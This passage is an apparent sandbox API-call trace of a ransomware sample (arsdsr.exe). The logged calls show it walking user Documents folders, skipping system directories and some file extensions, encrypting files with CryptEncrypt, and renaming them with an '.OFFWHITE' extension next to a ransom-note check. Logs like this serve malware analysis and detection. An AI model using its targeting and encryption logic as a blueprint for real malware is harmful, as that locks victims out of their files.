liDistanceToMove=0x16e8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.942] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.942] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16f8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.942] WriteFile (in: hFile=0xb0, lpBuffer=0x53f7e8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f7e8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0133.942] GetProcessHeap () returned 0x500000 [0133.943] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16d8e) returned 0x55a7b8 [0133.943] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.943] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x16d8e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x16d8e, lpOverlapped=0x0) returned 1 [0133.949] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.949] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x16d8e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x16d8e, lpOverlapped=0x0) returned 1 [0133.950] GetProcessHeap () returned 0x500000 [0133.950] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.950] CloseHandle (hObject=0xb0) returned 1 [0133.956] GetProcessHeap () returned 0x500000 [0133.956] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.956] GetProcessHeap () returned 0x500000 [0133.956] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.956] GetProcessHeap () returned 0x500000 [0133.956] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.956] GetProcessHeap () returned 0x500000 [0133.956] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.956] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt" [0133.957] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt.OFFWHITE" [0133.957] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mqumo01dr.odt"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mqumo01dr.odt.offwhite")) returned 1 [0133.958] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="...") returned 1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="$recycle.bin") returned 1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="rsa") returned -1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="ntuser.dat") returned -1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="programdata") returned -1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="appdata") returned 1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="program files") returned -1 [0133.958] lstrcmpiW (lpString1="My Music", lpString2="program files (x86)") returned -1 [0133.958] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.958] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Music" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0133.958] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0133.958] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0133.958] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*" [0133.959] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x2f52dd, ftLastAccessTime.dwHighDateTime=0x3, ftLastWriteTime.dwLowDateTime=0x7c, ftLastWriteTime.dwHighDateTime=0xa6829e1, nFileSizeHigh=0xc7645b07, nFileSizeLow=0x75401c46, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="ʕọ矋", cAlternateFileName="\x03")) returned 0xffffffff [0133.959] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="...") returned 1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="$recycle.bin") returned 1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="rsa") returned -1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="ntuser.dat") returned -1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="programdata") returned -1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="appdata") returned 1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="program files") returned -1 [0133.959] lstrcmpiW (lpString1="My Pictures", lpString2="program files (x86)") returned -1 [0133.959] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.959] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Pictures" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0133.959] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0133.959] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0133.959] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0133.960] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x2f52dd, ftLastAccessTime.dwHighDateTime=0x3, ftLastWriteTime.dwLowDateTime=0x7c, ftLastWriteTime.dwHighDateTime=0xa6829e1, nFileSizeHigh=0xc7645b07, nFileSizeLow=0x75401c46, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="ʕọ矋", cAlternateFileName="\x03")) returned 0xffffffff [0133.960] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2=".") returned 1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="..") returned 1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="...") returned 1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="windows") returned -1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="$recycle.bin") returned 1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="rsa") returned -1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="ntuser.dat") returned -1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="programdata") returned -1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="appdata") returned 1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="program files") returned -1 [0133.960] lstrcmpiW (lpString1="My Shapes", lpString2="program files (x86)") returned -1 [0133.960] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.960] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Shapes" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0133.960] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0133.960] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0133.960] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0133.961] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName=".", cAlternateFileName="")) returned 0x544650 [0133.961] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0133.961] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="..", cAlternateFileName="")) returned 1 [0133.961] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0133.961] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0133.961] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0133.961] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0133.961] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0133.961] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0133.961] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0133.961] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0133.961] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0133.962] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0133.962] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0133.962] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0133.962] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0133.962] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0133.962] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0133.962] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" [0133.962] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.962] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.962] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0133.962] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0133.962] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0133.962] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0133.962] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0133.962] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0133.962] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0133.962] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0133.962] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0133.962] lstrcmpiW (lpString1="Favorites.vss", lpString2=".") returned 1 [0133.962] lstrcmpiW (lpString1="Favorites.vss", lpString2="..") returned 1 [0133.962] lstrcmpiW (lpString1="Favorites.vss", lpString2="...") returned 1 [0133.962] lstrcmpiW (lpString1="Favorites.vss", lpString2="windows") returned -1 [0133.962] lstrcmpiW (lpString1="Favorites.vss", lpString2="$recycle.bin") returned 1 [0133.962] lstrcmpiW (lpString1="Favorites.vss", lpString2="rsa") returned -1 [0133.963] lstrcmpiW (lpString1="Favorites.vss", lpString2="ntuser.dat") returned -1 [0133.963] lstrcmpiW (lpString1="Favorites.vss", lpString2="programdata") returned -1 [0133.963] lstrcmpiW (lpString1="Favorites.vss", lpString2="appdata") returned 1 [0133.963] lstrcmpiW (lpString1="Favorites.vss", lpString2="program files") returned -1 [0133.963] lstrcmpiW (lpString1="Favorites.vss", lpString2="program files (x86)") returned -1 [0133.963] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0133.963] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="Favorites.vss" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" [0133.963] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.963] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.963] PathFindExtensionW (pszPath="Favorites.vss") returned=".vss" [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".exe") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".log") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".cab") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".cmd") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".com") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".cpl") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".ini") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".dll") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".url") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".ttf") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".mp3") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".pif") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".mp4") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".OFFWHITE") returned 1 [0133.963] lstrcmpiW (lpString1=".vss", lpString2=".msi") returned 1 [0133.964] lstrcmpiW (lpString1="Favorites.vss", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.964] GetProcessHeap () returned 0x500000 [0133.964] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f7f8 [0133.964] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0133.966] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=0) returned 1 [0133.966] GetProcessHeap () returned 0x500000 [0133.966] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.966] GetProcessHeap () returned 0x500000 [0133.966] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.966] GetProcessHeap () returned 0x500000 [0133.966] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.966] GetProcessHeap () returned 0x500000 [0133.966] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.966] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.966] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.966] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.966] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.966] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.967] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.967] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.967] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.967] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0133.967] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.967] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.967] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0133.968] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.968] SetLastError (dwErrCode=0x0) [0133.968] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0133.969] GetLastError () returned 0x0 [0133.969] GetLastError () returned 0x0 [0133.969] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.969] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0133.969] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.969] WriteFile (in: hFile=0x21c, lpBuffer=0x53f7f8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f7f8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0133.969] GetProcessHeap () returned 0x500000 [0133.969] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x0) returned 0x53f808 [0133.969] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.969] ReadFile (in: hFile=0x21c, lpBuffer=0x53f808, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x53f808*, lpNumberOfBytesRead=0x295dec0*=0x0, lpOverlapped=0x0) returned 1 [0133.969] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.969] WriteFile (in: hFile=0x21c, lpBuffer=0x53f808*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f808*, lpNumberOfBytesWritten=0x295decc*=0x0, lpOverlapped=0x0) returned 1 [0133.969] GetProcessHeap () returned 0x500000 [0133.969] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53f808 | out: hHeap=0x500000) returned 1 [0133.970] CloseHandle (hObject=0x21c) returned 1 [0133.971] GetProcessHeap () returned 0x500000 [0133.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.971] GetProcessHeap () returned 0x500000 [0133.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.971] GetProcessHeap () returned 0x500000 [0133.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.971] GetProcessHeap () returned 0x500000 [0133.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.971] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" 